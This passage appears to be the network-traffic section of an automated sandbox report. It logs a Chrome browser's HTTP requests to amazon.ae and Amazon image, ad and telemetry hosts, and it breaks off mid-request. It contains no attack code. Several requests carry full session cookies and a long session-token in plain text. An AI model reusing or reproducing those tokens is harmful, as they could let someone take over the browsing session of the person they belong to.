    Source: global trafficHTTP traffic detected: GET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51Gz7IimgoL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71YXfRqyg3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Smart_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_4K_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Large_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Under1999_1x._SY116_CB659039472_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1741561_3919943_379x304_1X_en_AE._SY304_CB566685890_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61Q2hRo4BCL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b077n51cr2_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_19_BTS24_AE_GW_QC-CROSSA_DQC_CL_PersonalCare_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11+d9I1l9AL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621420_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621421_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51mS5FhRwRL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61lJW9LVKqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/611TWGHXWyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/imp?b=RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51dMriM2HlL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.csm.csa.prod HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/61BpJ-+2UGL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cross_border_interstitial_sp/render HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:1GXSAVZ7MBDVTNT0VYNB+s-1GXSAVZ7MBDVTNT0VYNB|1723729092974&t:1723729092974&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/I/21o-CCsjGRL.css?AUIClients/OctopusBrowsePageAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/atf/%7B%22atf%22:true%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:0,%22t%22:0,%22def%22:%22amzn%22%7D,%22ptv%22:1723729087.293,%22ttv%22:1723729087.293%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/618LrXHTM3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07fsr5k7g_379x304_ae-en._SY116_CB623005785_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07yk48157_379x304_ae-en._SY116_CB623005781_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcar_b07pcm7ds2_379x304_ae-en._SY116_CB623005780_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61wm2WQpqYL.css?AUIClients/ACSWidgetAssets-contentGrid HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1723729088.245,%22ttv%22:1723729088.245%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:943.015625,%22v%22:%7B%22p%22:100,%22t%22:1,%22def%22:%22groupm%22%7D,%22ptv%22:1723729088.246,%22ttv%22:1723729088.246%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:1GXSAVZ7MBDVTNT0VYNB$uedata=s:%2Frd%2Fuedata%3Ful%26v%3D0.295223.0%26id%3D1GXSAVZ7MBDVTNT0VYNB%26m%3D1%26sc%3D1GXSAVZ7MBDVTNT0VYNB%26ue%3D7%26bb%3D1101%26ns%3D1276%26ne%3D1393%26cf%3D1395%26af%3D2238%26fn%3D2238%26be%3D2706%26fp%3D1311%26fcp%3D1311%26pc%3D7915%26tc%3D-1341%26na_%3D-1341%26ul_%3D-1723729085060%26_ul%3D-1723729085060%26rd_%3D-1723729085060%26_rd%3D-1723729085060%26fe_%3D-1337%26lk_%3D-1227%26_lk%3D-1227%26co_%3D-1227%26_co%3D-411%26sc_%3D-1212%26rq_%3D-386%26rs_%3D-56%26_rs%3D502%26dl_%3D-45%26di_%3D2770%26de_%3D2770%26_de%3D2770%26_dc%3D-1723729085060%26ld_%3D-1723729085060%26_ld%3D-1723729085060%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D5%26hoe%3D8%26ul%3D7915%26t%3D1723729092975%26ctb%3D1%26rt%3Dcf%3A22-1-3-18-2-8-0_af%3A34-1-3-30-2-8-0_%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cnavbar%7CgwCFImgCache%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%7Cadrender%3AGateway%3Aright-2%3Adesktop%7Cadrender%3Alightad%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%7Cadrender%3Alightad%3AGateway%3Aright-2%3Adesktop%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Acreativeid%3A579371395698106697%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Acreativeid%3A579371395698106697%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Aprogramid%3A1001%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Aprogramid%3A1001%7Cadrender%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Aright-2%3Adesktop%3Acreativetemplatename%3Aimage%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cak_cdn_fr%7Cak_cdn_mp%7CmutObsActive%7Ccsm-feature-touch-enabled%3Afalse%7CbrowserQuiteFn%26viz%3Dvisible%3A7%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26ui%3D2%26lob%3D1:7929 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Cache-Control: max-age=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 